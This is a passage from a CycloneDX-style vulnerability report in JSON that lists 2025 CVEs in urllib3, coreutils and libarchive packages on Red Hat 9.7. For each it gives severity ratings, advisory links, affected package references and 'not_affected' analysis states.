          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-3.el9_7.2?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-libs@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3@3.9.25-3.el9_7.2?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-50181",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Prior to 2.5.0, it is possible to disable redirects for all requests by instantiating a PoolManager and specifying retries in a way that disable redirects. By default, requests and botocore users are not affected. An application attempting to mitigate SSRF or open redirect vulnerabilities by disabling redirects at the PoolManager level will remain vulnerable. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50181"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50181"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-pq67-6m6q-mj2v"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50181"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
        }
      ],
      "published": "2025-06-19T01:15:24+00:00",
      "updated": "2025-12-22T19:15:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        }
      ]
    },
    {
      "id": "CVE-2025-50182",
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        601
      ],
      "description": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 2.2.0 and prior to 2.5.0, urllib3 does not control redirects in browsers and Node.js. urllib3 supports being used in a Pyodide runtime utilizing the JavaScript Fetch API or falling back on XMLHttpRequest. This means Python libraries can be used to make HTTP requests from a browser or Node.js. Additionally, urllib3 provides a mechanism to control redirects, but the retries and redirect parameters are ignored with Pyodide; the runtime itself determines redirect behavior. This issue has been patched in version 2.5.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-50182"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-50182"
        },
        {
          "url": "https://github.com/urllib3/urllib3"
        },
        {
          "url": "https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f"
        },
        {
          "url": "https://github.com/urllib3/urllib3/releases/tag/2.5.0"
        },
        {
          "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-48p4-8xcf-vxj5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50182"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7599-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
        }
      ],
      "published": "2025-06-19T02:15:17+00:00",
      "updated": "2025-12-22T19:15:49+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7",
          "versions": [
            {
              "version": "21.3.1-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/python3-pip@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-1.el9?arch=noarch&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-5278",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L"
        }
      ],
      "cwes": [
        121
      ],
      "description": "A flaw was found in GNU Coreutils. The sort utility's begfield() function is vulnerable to a heap buffer under-read. The program may access memory outside the allocated buffer if a user runs a crafted command using the traditional key format. A malicious input could lead to a crash or leak sensitive data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5278"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/27/2"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/29/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/05/29/2"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5278"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2368764"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/commit/?id=8c9602e3a145e9596dc1a63c6ed67865814b6633"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/coreutils.git/tree/NEWS?id=8c9602e3a145e9596dc1a63c6ed67865814b6633#n14"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5278"
        },
        {
          "url": "https://security-tracker.debian.org/tracker/CVE-2025-5278"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5278"
        }
      ],
      "published": "2025-05-27T21:15:23+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "8.32-39.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/coreutils-single@8.32-39.el9?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-5915",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.6,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw can lead to a heap buffer over-read due to the size of a filter block potentially exceeding the Lempel-Ziv-Storer-Schieber (LZSS) window. This means the library may attempt to read beyond the allocated memory buffer, which can result in unpredictable program behavior, crashes (denial of service), or the disclosure of sensitive information from adjacent memory regions.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5915"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5915"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370865"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2599"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5915"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5915"
        }
      ],
      "published": "2025-06-09T20:15:26+00:00",
      "updated": "2026-01-08T04:15:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-5916",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A vulnerability has been identified in the libarchive library. This flaw involves an integer overflow that can be triggered when processing a Web Archive (WARC) file that claims to have more than INT64_MAX - 4 content bytes. An attacker could craft a malicious WARC archive to induce this overflow, potentially leading to unpredictable program behavior, memory corruption, or a denial-of-service condition within applications that process such archives using libarchive. This bug affects libarchive versions prior to 3.8.0.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-5916"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-5916"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370872"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/2568/commits/bce70c4c26864df2a8d6953e7db6e4b156253508"
        },
        {
          "url": "https://github.com/libarchive/libarchive/releases/tag/v3.8.0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5916"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7601-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-5916"
        }
      ],
      "published": "2025-06-09T20:15:27+00:00",
      "updated": "2025-12-12T01:15:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.5.3-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
